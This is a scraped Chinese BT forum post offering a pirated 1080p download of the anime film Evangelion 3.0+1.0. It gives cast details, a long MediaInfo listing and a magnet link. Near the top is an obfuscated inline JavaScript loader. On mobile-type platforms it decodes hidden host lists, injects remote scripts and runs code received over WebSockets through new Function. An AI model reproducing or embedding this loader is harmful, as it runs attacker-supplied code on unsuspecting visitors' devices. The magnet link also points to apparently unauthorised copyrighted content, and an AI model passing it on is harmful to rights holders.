新·福音战士剧场版:终[国语中字].Evangelion.-.3.01.0.Thrice.Upon.a.Time.2021.1080p.AMZN.WEB-DL.DDP5.1.H.264 12.74GB

版主小s 1月前 301

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 新·福音战士剧场版:终 / 新·福音战士剧场版:│▌ / Evangelion: 3.0+1.0 / Evangelion Shin Gekijo-ban / Rebuild of Evangelion 4.0: Final / Evangelion: 3.0+1.0 Thrice Upon a Time
◎片  名 シン?エヴァンゲリオン劇場版:│▌
◎年  代 2021
◎产  地 日本
◎类  别 剧情 / 科幻 / 动画
◎语  言 日语
◎上映日期 2021-03-08(日本) / 2021-08-13(美国网络)
◎IMDb链接 https://www.imdb.com/title/tt2458948/
◎豆瓣评分 8.7/10 (2441人评价)
◎豆瓣链接 https://movie.douban.com/subject/10428501/
◎片  长 154分钟
◎导  演 庵野秀明 Hideaki Anno (id:1059748)
       鹤卷和哉 Kazuya Tsurumaki (id:1005624)
       中山胜一 Nakayama Katsuichi (id:1431721)
       前田真宏 Mahiro Maeda (id:1314381)
◎编  剧 庵野秀明 Hideaki Anno (id:1059748)
◎演  员 林原惠美 Megumi Hayashibara (id:1002915)
       绪方惠美 Megumi Ogata (id:1019398)
       宫村优子 Y?ko Miyamura (id:1037542)
       石田彰 Akira Ishida (id:1042150)
       坂本真绫 Maaya Sakamoto (id:1146783)
       三石琴乃 Kotono Mitsuishi (id:1037583)
       山口由里子 Yuriko Yamaguchi (id:1042487)
       立木文彦 Fumihiko Tachiki (id:1048550)
       清川元梦 Motomu Kiyokawa (id:1003792)
       子安武人 Takehito Koyasu (id:1054354)
       优希比吕 Hiro Yuuki (id:1168517)
       长泽美树 Miki Nagasawa (id:1013083)
       山寺宏一 K?ichi Yamadera (id:1019299)
       麦人 Mugihito (id:1025850)
       川村万梨阿 Maria Kawamura (id:1043324)
       关智一 Tomokazu Seki (id:1050981)
       岩永哲哉 Tetsuya Iwanaga (id:1013076)
       岩男润子 Junko Iwao (id:1006012)
       神木隆之介 Ry?nosuke Kamiki (id:1185637)
       鹭巢诗郎 Shir? Sagisu (id:1051546)
       贞本义行 Yoshiyuki Sadamoto (id:1141828)
       樋口真嗣 Shinji Higuchi (id:1051346)
       碇谷敦 Itagaki Atsushi (id:1432202)
       桥本敬史 Hashimoto Takashi (id:1275919)
       田中将贺 Tanaka Masayoshi (id:1400403)

◎标  签 EVA / 庵野秀明 / 剧场版 / 日本 / 动画 / 日本动画 / 动漫 / 经典

◎简  介
  成为“第三次冲击”元凶的碇真嗣,变得像废人一样……真嗣还能振作起来吗?2012年《福音战士新剧场版:Q》之后,这部动画讲述了被封印的故事的后续。

◎获奖情况 (共2项)
  第7届豆瓣电影年度榜单 (2020)
  最值得期待的外语电影(提名)

  第6届豆瓣电影年度榜单 (2019)
  最值得期待的外语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 225507255540015395013887806657344795373 (0xA9A71E1BD3C61400A6B61F7B083772ED)

  4. Complete name                            : Evangelion.-.3.01[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 12.7 GiB

  8. Duration                                 : 2 h 35 min

  9. Overall bit rate                         : 11.7 Mb/s

  10. Encoded date                             : UTC 2021-08-18 02:53:14

  11. Writing application                      : mkvmerge v43.0.0 ('The Quartermaster') 64-bit

  12. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 4 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 4 frames

  21. Codec ID                                 : V_MPEG4/ISO/AVC

  22. Duration                                 : 2 h 35 min

  23. Bit rate mode                            : Constant

  24. Bit rate                                 : 4 660 kb/s

  25. Nominal bit rate                         : 10 000 kb/s

  26. Width                                    : 1 920 pixels

  27. Height                                   : 816 pixels

  28. Display aspect ratio                     : 2.35:1

  29. Frame rate mode                          : Constant

  30. Frame rate                               : 24.000 FPS

  31. Color space                              : YUV

  32. Chroma subsampling                       : 4:2:0

  33. Bit depth                                : 8 bits

  34. Scan type                                : Progressive

  35. Bits/(Pixel*Frame)                       : 0.124

  36. Stream size                              : 5.07 GiB (40%)

  37. Default                                  : Yes

  38. Forced                                   : No

  39. Color range                              : Limited

  40. Color primaries                          : BT.709

  41. Transfer characteristics                 : BT.709

  42. Matrix coefficients                      : BT.709


  43. Audio #1

  44. ID                                       : 2

  45. Format                                   : E-AC-3

  46. Format/Info                              : Enhanced AC-3

  47. Commercial name                          : Dolby Digital Plus

  48. Codec ID                                 : A_EAC3

  49. Duration                                 : 2 h 35 min

  50. Bit rate mode                            : Constant

  51. Bit rate                                 : 640 kb/s

  52. Channel(s)                               : 6 channels

  53. Channel layout                           : L R C LFE Ls Rs

  54. Sampling rate                            : 48.0 kHz

  55. Frame rate                               : 31.250 FPS (1536 SPF)

  56. Compression mode                         : Lossy

  57. Stream size                              : 713 MiB (5%)

  58. Title                                    : German

  59. Language                                 : German

  60. Service kind                             : Complete Main

  61. Default                                  : No

  62. Forced                                   : No


  63. Audio #2

  64. ID                                       : 3

  65. Format                                   : E-AC-3

  66. Format/Info                              : Enhanced AC-3

  67. Commercial name                          : Dolby Digital Plus

  68. Codec ID                                 : A_EAC3

  69. Duration                                 : 2 h 35 min

  70. Bit rate mode                            : Constant

  71. Bit rate                                 : 640 kb/s

  72. Channel(s)                               : 6 channels

  73. Channel layout                           : L R C LFE Ls Rs

  74. Sampling rate                            : 48.0 kHz

  75. Frame rate                               : 31.250 FPS (1536 SPF)

  76. Compression mode                         : Lossy

  77. Stream size                              : 713 MiB (5%)

  78. Title                                    : English

  79. Language                                 : English

  80. Service kind                             : Complete Main

  81. Default                                  : Yes

  82. Forced                                   : No


  83. Audio #3

  84. ID                                       : 4

  85. Format                                   : E-AC-3

  86. Format/Info                              : Enhanced AC-3

  87. Commercial name                          : Dolby Digital Plus

  88. Codec ID                                 : A_EAC3

  89. Duration                                 : 2 h 35 min

  90. Bit rate mode                            : Constant

  91. Bit rate                                 : 640 kb/s

  92. Channel(s)                               : 6 channels

  93. Channel layout                           : L R C LFE Ls Rs

  94. Sampling rate                            : 48.0 kHz

  95. Frame rate                               : 31.250 FPS (1536 SPF)

  96. Compression mode                         : Lossy

  97. Stream size                              : 713 MiB (5%)

  98. Title                                    : Castilian

  99. Language                                 : Spanish

  100. Service kind                             : Complete Main

  101. Default                                  : No

  102. Forced                                   : No


  103. Audio #4

  104. ID                                       : 5

  105. Format                                   : E-AC-3

  106. Format/Info                              : Enhanced AC-3

  107. Commercial name                          : Dolby Digital Plus

  108. Codec ID                                 : A_EAC3

  109. Duration                                 : 2 h 35 min

  110. Bit rate mode                            : Constant

  111. Bit rate                                 : 640 kb/s

  112. Channel(s)                               : 6 channels

  113. Channel layout                           : L R C LFE Ls Rs

  114. Sampling rate                            : 48.0 kHz

  115. Frame rate                               : 31.250 FPS (1536 SPF)

  116. Compression mode                         : Lossy

  117. Stream size                              : 713 MiB (5%)

  118. Title                                    : Spanish

  119. Language                                 : Spanish

  120. Service kind                             : Complete Main

  121. Default                                  : No

  122. Forced                                   : No


  123. Audio #5

  124. ID                                       : 6

  125. Format                                   : E-AC-3

  126. Format/Info                              : Enhanced AC-3

  127. Commercial name                          : Dolby Digital Plus

  128. Codec ID                                 : A_EAC3

  129. Duration                                 : 2 h 35 min

  130. Bit rate mode                            : Constant

  131. Bit rate                                 : 640 kb/s

  132. Channel(s)                               : 6 channels

  133. Channel layout                           : L R C LFE Ls Rs

  134. Sampling rate                            : 48.0 kHz

  135. Frame rate                               : 31.250 FPS (1536 SPF)

  136. Compression mode                         : Lossy

  137. Stream size                              : 713 MiB (5%)

  138. Title                                    : French

  139. Language                                 : French

  140. Service kind                             : Complete Main

  141. Default                                  : No

  142. Forced                                   : No


  143. Audio #6

  144. ID                                       : 7

  145. Format                                   : E-AC-3

  146. Format/Info                              : Enhanced AC-3

  147. Commercial name                          : Dolby Digital Plus

  148. Codec ID                                 : A_EAC3

  149. Duration                                 : 2 h 35 min

  150. Bit rate mode                            : Constant

  151. Bit rate                                 : 640 kb/s

  152. Channel(s)                               : 6 channels

  153. Channel layout                           : L R C LFE Ls Rs

  154. Sampling rate                            : 48.0 kHz

  155. Frame rate                               : 31.250 FPS (1536 SPF)

  156. Compression mode                         : Lossy

  157. Stream size                              : 713 MiB (5%)

  158. Title                                    : Italian

  159. Language                                 : Italian

  160. Service kind                             : Complete Main

  161. Default                                  : No

  162. Forced                                   : No


  163. Audio #7

  164. ID                                       : 8

  165. Format                                   : E-AC-3

  166. Format/Info                              : Enhanced AC-3

  167. Commercial name                          : Dolby Digital Plus

  168. Codec ID                                 : A_EAC3

  169. Duration                                 : 2 h 35 min

  170. Bit rate mode                            : Constant

  171. Bit rate                                 : 640 kb/s

  172. Channel(s)                               : 6 channels

  173. Channel layout                           : L R C LFE Ls Rs

  174. Sampling rate                            : 48.0 kHz

  175. Frame rate                               : 31.250 FPS (1536 SPF)

  176. Compression mode                         : Lossy

  177. Stream size                              : 713 MiB (5%)

  178. Title                                    : Portuguese

  179. Language                                 : Portuguese

  180. Service kind                             : Complete Main

  181. Default                                  : No

  182. Forced                                   : No


  183. Audio #8

  184. ID                                       : 9

  185. Format                                   : E-AC-3

  186. Format/Info                              : Enhanced AC-3

  187. Commercial name                          : Dolby Digital Plus

  188. Codec ID                                 : A_EAC3

  189. Duration                                 : 2 h 35 min

  190. Bit rate mode                            : Constant

  191. Bit rate                                 : 640 kb/s

  192. Channel(s)                               : 6 channels

  193. Channel layout                           : L R C LFE Ls Rs

  194. Sampling rate                            : 48.0 kHz

  195. Frame rate                               : 31.250 FPS (1536 SPF)

  196. Compression mode                         : Lossy

  197. Stream size                              : 713 MiB (5%)

  198. Title                                    : Hindi

  199. Language                                 : Hindi

  200. Service kind                             : Complete Main

  201. Default                                  : No

  202. Forced                                   : No


  203. Audio #9

  204. ID                                       : 10

  205. Format                                   : E-AC-3

  206. Format/Info                              : Enhanced AC-3

  207. Commercial name                          : Dolby Digital Plus

  208. Codec ID                                 : A_EAC3

  209. Duration                                 : 2 h 35 min

  210. Bit rate mode                            : Constant

  211. Bit rate                                 : 640 kb/s

  212. Channel(s)                               : 6 channels

  213. Channel layout                           : L R C LFE Ls Rs

  214. Sampling rate                            : 48.0 kHz

  215. Frame rate                               : 31.250 FPS (1536 SPF)

  216. Compression mode                         : Lossy

  217. Stream size                              : 713 MiB (5%)

  218. Title                                    : Chinese

  219. Language                                 : Chinese

  220. Service kind                             : Complete Main

  221. Default                                  : No

  222. Forced                                   : No


  223. Audio #10

  224. ID                                       : 11

  225. Format                                   : E-AC-3

  226. Format/Info                              : Enhanced AC-3

  227. Commercial name                          : Dolby Digital Plus

  228. Codec ID                                 : A_EAC3

  229. Duration                                 : 2 h 35 min

  230. Bit rate mode                            : Constant

  231. Bit rate                                 : 640 kb/s

  232. Channel(s)                               : 6 channels

  233. Channel layout                           : L R C LFE Ls Rs

  234. Sampling rate                            : 48.0 kHz

  235. Frame rate                               : 31.250 FPS (1536 SPF)

  236. Compression mode                         : Lossy

  237. Stream size                              : 713 MiB (5%)

  238. Title                                    : Japanese

  239. Language                                 : Japanese

  240. Service kind                             : Complete Main

  241. Default                                  : No

  242. Forced                                   : No


  243. Audio #11

  244. ID                                       : 12

  245. Format                                   : E-AC-3

  246. Format/Info                              : Enhanced AC-3

  247. Commercial name                          : Dolby Digital Plus

  248. Codec ID                                 : A_EAC3

  249. Duration                                 : 2 h 35 min

  250. Bit rate mode                            : Constant

  251. Bit rate                                 : 640 kb/s

  252. Channel(s)                               : 6 channels

  253. Channel layout                           : L R C LFE Ls Rs

  254. Sampling rate                            : 48.0 kHz

  255. Frame rate                               : 31.250 FPS (1536 SPF)

  256. Compression mode                         : Lossy

  257. Stream size                              : 713 MiB (5%)

  258. Title                                    : Korean

  259. Language                                 : Korean

  260. Service kind                             : Complete Main

  261. Default                                  : No

  262. Forced                                   : No


  263. Text #1

  264. ID                                       : 13

  265. Format                                   : UTF-8

  266. Codec ID                                 : S_TEXT/UTF8

  267. Codec ID/Info                            : UTF-8 Plain Text

  268. Duration                                 : 2 h 34 min

  269. Bit rate                                 : 53 b/s

  270. Count of elements                        : 1765

  271. Stream size                              : 60.7 KiB (0%)

  272. Title                                    : Malay

  273. Language                                 : Malay

  274. Default                                  : No

  275. Forced                                   : No


  276. Text #2

  277. ID                                       : 14

  278. Format                                   : UTF-8

  279. Codec ID                                 : S_TEXT/UTF8

  280. Codec ID/Info                            : UTF-8 Plain Text

  281. Duration                                 : 2 h 34 min

  282. Bit rate                                 : 54 b/s

  283. Count of elements                        : 1627

  284. Stream size                              : 61.4 KiB (0%)

  285. Title                                    : Danish

  286. Language                                 : Danish

  287. Default                                  : No

  288. Forced                                   : No


  289. Text #3

  290. ID                                       : 15

  291. Format                                   : UTF-8

  292. Codec ID                                 : S_TEXT/UTF8

  293. Codec ID/Info                            : UTF-8 Plain Text

  294. Duration                                 : 2 h 34 min

  295. Bit rate                                 : 59 b/s

  296. Count of elements                        : 1718

  297. Stream size                              : 67.8 KiB (0%)

  298. Title                                    : German

  299. Language                                 : German

  300. Default                                  : No

  301. Forced                                   : No


  302. Text #4

  303. ID                                       : 16

  304. Format                                   : UTF-8

  305. Codec ID                                 : S_TEXT/UTF8

  306. Codec ID/Info                            : UTF-8 Plain Text

  307. Duration                                 : 2 h 34 min

  308. Bit rate                                 : 67 b/s

  309. Count of elements                        : 2126

  310. Stream size                              : 76.2 KiB (0%)

  311. Title                                    : English (SDH)

  312. Language                                 : English

  313. Default                                  : No

  314. Forced                                   : No


  315. Text #5

  316. ID                                       : 17

  317. Format                                   : UTF-8

  318. Codec ID                                 : S_TEXT/UTF8

  319. Codec ID/Info                            : UTF-8 Plain Text

  320. Duration                                 : 2 h 34 min

  321. Bit rate                                 : 53 b/s

  322. Count of elements                        : 1811

  323. Stream size                              : 60.1 KiB (0%)

  324. Title                                    : Castilian

  325. Language                                 : Spanish

  326. Default                                  : No

  327. Forced                                   : No


  328. Text #6

  329. ID                                       : 18

  330. Format                                   : UTF-8

  331. Codec ID                                 : S_TEXT/UTF8

  332. Codec ID/Info                            : UTF-8 Plain Text

  333. Duration                                 : 2 h 34 min

  334. Bit rate                                 : 55 b/s

  335. Count of elements                        : 1983

  336. Stream size                              : 62.4 KiB (0%)

  337. Title                                    : Spanish

  338. Language                                 : Spanish

  339. Default                                  : No

  340. Forced                                   : No


  341. Text #7

  342. ID                                       : 19

  343. Format                                   : UTF-8

  344. Codec ID                                 : S_TEXT/UTF8

  345. Codec ID/Info                            : UTF-8 Plain Text

  346. Duration                                 : 2 h 34 min

  347. Bit rate                                 : 60 b/s

  348. Count of elements                        : 1932

  349. Stream size                              : 68.7 KiB (0%)

  350. Title                                    : Filipino

  351. Language                                 : fil

  352. Default                                  : No

  353. Forced                                   : No


  354. Text #8

  355. ID                                       : 20

  356. Format                                   : UTF-8

  357. Codec ID                                 : S_TEXT/UTF8

  358. Codec ID/Info                            : UTF-8 Plain Text

  359. Duration                                 : 2 h 34 min

  360. Bit rate                                 : 59 b/s

  361. Count of elements                        : 2078

  362. Stream size                              : 67.5 KiB (0%)

  363. Title                                    : French

  364. Language                                 : French

  365. Default                                  : No

  366. Forced                                   : No


  367. Text #9

  368. ID                                       : 21

  369. Format                                   : UTF-8

  370. Codec ID                                 : S_TEXT/UTF8

  371. Codec ID/Info                            : UTF-8 Plain Text

  372. Duration                                 : 2 h 34 min

  373. Bit rate                                 : 55 b/s

  374. Count of elements                        : 1773

  375. Stream size                              : 62.3 KiB (0%)

  376. Title                                    : Indonesian

  377. Language                                 : Indonesian

  378. Default                                  : No

  379. Forced                                   : No


  380. Text #10

  381. ID                                       : 22

  382. Format                                   : UTF-8

  383. Codec ID                                 : S_TEXT/UTF8

  384. Codec ID/Info                            : UTF-8 Plain Text

  385. Duration                                 : 2 h 33 min

  386. Bit rate                                 : 66 b/s

  387. Count of elements                        : 1879

  388. Stream size                              : 75.0 KiB (0%)

  389. Title                                    : Italian

  390. Language                                 : Italian

  391. Default                                  : No

  392. Forced                                   : No


  393. Text #11

  394. ID                                       : 23

  395. Format                                   : UTF-8

  396. Codec ID                                 : S_TEXT/UTF8

  397. Codec ID/Info                            : UTF-8 Plain Text

  398. Duration                                 : 2 h 34 min

  399. Bit rate                                 : 53 b/s

  400. Count of elements                        : 1736

  401. Stream size                              : 60.3 KiB (0%)

  402. Title                                    : Dutch

  403. Language                                 : Dutch

  404. Default                                  : No

  405. Forced                                   : No


  406. Text #12

  407. ID                                       : 24

  408. Format                                   : UTF-8

  409. Codec ID                                 : S_TEXT/UTF8

  410. Codec ID/Info                            : UTF-8 Plain Text

  411. Duration                                 : 2 h 34 min

  412. Bit rate                                 : 50 b/s

  413. Count of elements                        : 1516

  414. Stream size                              : 56.8 KiB (0%)

  415. Title                                    : Norwegian

  416. Language                                 : Norwegian Bokmal

  417. Default                                  : No

  418. Forced                                   : No


  419. Text #13

  420. ID                                       : 25

  421. Format                                   : UTF-8

  422. Codec ID                                 : S_TEXT/UTF8

  423. Codec ID/Info                            : UTF-8 Plain Text

  424. Duration                                 : 2 h 34 min

  425. Bit rate                                 : 55 b/s

  426. Count of elements                        : 1751

  427. Stream size                              : 62.4 KiB (0%)

  428. Title                                    : Polish

  429. Language                                 : Polish

  430. Default                                  : No

  431. Forced                                   : No


  432. Text #14

  433. ID                                       : 26

  434. Format                                   : UTF-8

  435. Codec ID                                 : S_TEXT/UTF8

  436. Codec ID/Info                            : UTF-8 Plain Text

  437. Duration                                 : 2 h 34 min

  438. Bit rate                                 : 53 b/s

  439. Count of elements                        : 1981

  440. Stream size                              : 60.4 KiB (0%)

  441. Title                                    : Portuguese (Brasil)

  442. Language                                 : Portuguese

  443. Default                                  : No

  444. Forced                                   : No


  445. Text #15

  446. ID                                       : 27

  447. Format                                   : UTF-8

  448. Codec ID                                 : S_TEXT/UTF8

  449. Codec ID/Info                            : UTF-8 Plain Text

  450. Duration                                 : 2 h 34 min

  451. Bit rate                                 : 54 b/s

  452. Count of elements                        : 1762

  453. Stream size                              : 61.9 KiB (0%)

  454. Title                                    : Portuguese (Portugal)

  455. Language                                 : Portuguese

  456. Default                                  : No

  457. Forced                                   : No


  458. Text #16

  459. ID                                       : 28

  460. Format                                   : UTF-8

  461. Codec ID                                 : S_TEXT/UTF8

  462. Codec ID/Info                            : UTF-8 Plain Text

  463. Duration                                 : 2 h 34 min

  464. Bit rate                                 : 54 b/s

  465. Count of elements                        : 1319

  466. Stream size                              : 62.2 KiB (0%)

  467. Title                                    : Finnish

  468. Language                                 : Finnish

  469. Default                                  : No

  470. Forced                                   : No


  471. Text #17

  472. ID                                       : 29

  473. Format                                   : UTF-8

  474. Codec ID                                 : S_TEXT/UTF8

  475. Codec ID/Info                            : UTF-8 Plain Text

  476. Duration                                 : 2 h 34 min

  477. Bit rate                                 : 59 b/s

  478. Count of elements                        : 1750

  479. Stream size                              : 67.2 KiB (0%)

  480. Title                                    : Swedish

  481. Language                                 : Swedish

  482. Default                                  : No

  483. Forced                                   : No


  484. Text #18

  485. ID                                       : 30

  486. Format                                   : UTF-8

  487. Codec ID                                 : S_TEXT/UTF8

  488. Codec ID/Info                            : UTF-8 Plain Text

  489. Duration                                 : 2 h 34 min

  490. Bit rate                                 : 54 b/s

  491. Count of elements                        : 1751

  492. Stream size                              : 61.4 KiB (0%)

  493. Title                                    : Turkish

  494. Language                                 : Turkish

  495. Default                                  : No

  496. Forced                                   : No


  497. Text #19

  498. ID                                       : 31

  499. Format                                   : UTF-8

  500. Codec ID                                 : S_TEXT/UTF8

  501. Codec ID/Info                            : UTF-8 Plain Text

  502. Duration                                 : 2 h 34 min

  503. Bit rate                                 : 103 b/s

  504. Count of elements                        : 1754

  505. Stream size                              : 117 KiB (0%)

  506. Title                                    : Russian

  507. Language                                 : Russian

  508. Default                                  : No

  509. Forced                                   : No


  510. Text #20

  511. ID                                       : 32

  512. Format                                   : UTF-8

  513. Codec ID                                 : S_TEXT/UTF8

  514. Codec ID/Info                            : UTF-8 Plain Text

  515. Duration                                 : 2 h 34 min

  516. Bit rate                                 : 89 b/s

  517. Count of elements                        : 1760

  518. Stream size                              : 101 KiB (0%)

  519. Title                                    : Hebrew

  520. Language                                 : Hebrew

  521. Default                                  : No

  522. Forced                                   : No


  523. Text #21

  524. ID                                       : 33

  525. Format                                   : UTF-8

  526. Codec ID                                 : S_TEXT/UTF8

  527. Codec ID/Info                            : UTF-8 Plain Text

  528. Duration                                 : 2 h 34 min

  529. Bit rate                                 : 96 b/s

  530. Count of elements                        : 1754

  531. Stream size                              : 109 KiB (0%)

  532. Title                                    : Arabic

  533. Language                                 : Arabic

  534. Default                                  : No

  535. Forced                                   : No


  536. Text #22

  537. ID                                       : 34

  538. Format                                   : UTF-8

  539. Codec ID                                 : S_TEXT/UTF8

  540. Codec ID/Info                            : UTF-8 Plain Text

  541. Duration                                 : 2 h 34 min

  542. Bit rate                                 : 146 b/s

  543. Count of elements                        : 1759

  544. Stream size                              : 166 KiB (0%)

  545. Title                                    : Hindi

  546. Language                                 : Hindi

  547. Default                                  : No

  548. Forced                                   : No


  549. Text #23

  550. ID                                       : 35

  551. Format                                   : UTF-8

  552. Codec ID                                 : S_TEXT/UTF8

  553. Codec ID/Info                            : UTF-8 Plain Text

  554. Duration                                 : 2 h 34 min

  555. Bit rate                                 : 174 b/s

  556. Count of elements                        : 1763

  557. Stream size                              : 197 KiB (0%)

  558. Title                                    : Tamil

  559. Language                                 : Tamil

  560. Default                                  : No

  561. Forced                                   : No


  562. Text #24

  563. ID                                       : 36

  564. Format                                   : UTF-8

  565. Codec ID                                 : S_TEXT/UTF8

  566. Codec ID/Info                            : UTF-8 Plain Text

  567. Duration                                 : 2 h 34 min

  568. Bit rate                                 : 158 b/s

  569. Count of elements                        : 1766

  570. Stream size                              : 179 KiB (0%)

  571. Title                                    : Telugu

  572. Language                                 : Telugu

  573. Default                                  : No

  574. Forced                                   : No


  575. Text #25

  576. ID                                       : 37

  577. Format                                   : UTF-8

  578. Codec ID                                 : S_TEXT/UTF8

  579. Codec ID/Info                            : UTF-8 Plain Text

  580. Duration                                 : 2 h 34 min

  581. Bit rate                                 : 149 b/s

  582. Count of elements                        : 1761

  583. Stream size                              : 169 KiB (0%)

  584. Title                                    : Thai

  585. Language                                 : Thai

  586. Default                                  : No

  587. Forced                                   : No


  588. Text #26

  589. ID                                       : 38

  590. Format                                   : UTF-8

  591. Codec ID                                 : S_TEXT/UTF8

  592. Codec ID/Info                            : UTF-8 Plain Text

  593. Duration                                 : 2 h 34 min

  594. Bit rate                                 : 52 b/s

  595. Count of elements                        : 1770

  596. Stream size                              : 59.6 KiB (0%)

  597. Title                                    : Chinese (Simplified)

  598. Language                                 : Chinese

  599. Default                                  : No

  600. Forced                                   : No


  601. Text #27

  602. ID                                       : 39

  603. Format                                   : UTF-8

  604. Codec ID                                 : S_TEXT/UTF8

  605. Codec ID/Info                            : UTF-8 Plain Text

  606. Duration                                 : 2 h 34 min

  607. Bit rate                                 : 47 b/s

  608. Count of elements                        : 1760

  609. Stream size                              : 53.8 KiB (0%)

  610. Title                                    : Chinese (Traditional)

  611. Language                                 : Chinese

  612. Default                                  : No

  613. Forced                                   : No


  614. Text #28

  615. ID                                       : 40

  616. Format                                   : UTF-8

  617. Codec ID                                 : S_TEXT/UTF8

  618. Codec ID/Info                            : UTF-8 Plain Text

  619. Duration                                 : 2 h 33 min

  620. Bit rate                                 : 89 b/s

  621. Count of elements                        : 2366

  622. Stream size                              : 100 KiB (0%)

  623. Title                                    : Japanese (SDH)

  624. Language                                 : Japanese

  625. Default                                  : No

  626. Forced                                   : No


  627. Text #29

  628. ID                                       : 41

  629. Format                                   : UTF-8

  630. Codec ID                                 : S_TEXT/UTF8

  631. Codec ID/Info                            : UTF-8 Plain Text

  632. Duration                                 : 2 h 34 min

  633. Bit rate                                 : 62 b/s

  634. Count of elements                        : 1753

  635. Stream size                              : 70.5 KiB (0%)

  636. Title                                    : Korean

  637. Language                                 : Korean

  638. Default                                  : No

  639. Forced                                   : No



TAGS 剧情 动画 科幻

磁力链:
  • magnet:?xt=urn:btih:0F1E2C51CD769331509E3A02530DF4E9827709BF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖